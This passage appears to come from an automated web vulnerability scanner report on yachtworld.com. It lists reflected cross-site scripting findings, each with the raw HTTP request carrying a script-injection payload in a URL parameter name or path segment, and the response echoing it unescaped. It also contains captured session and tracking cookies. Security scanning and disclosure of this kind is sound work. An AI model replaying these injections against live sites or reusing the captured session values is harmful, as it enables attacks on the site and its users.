B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:44 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
f="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c&boat_id=2305157">
...[SNIP]...

3.100. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28dc4"><script>alert(1)</script>1263c813c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States?28dc4"><script>alert(1)</script>1263c813c97=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:33 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&28dc4"><script>alert(1)</script>1263c813c97=1&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States&boat_id=2305157">
...[SNIP]...

3.101. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37913"><script>alert(1)</script>074a64c253c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
w" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.102. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f752b"><script>alert(1)</script>40b5af5053c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 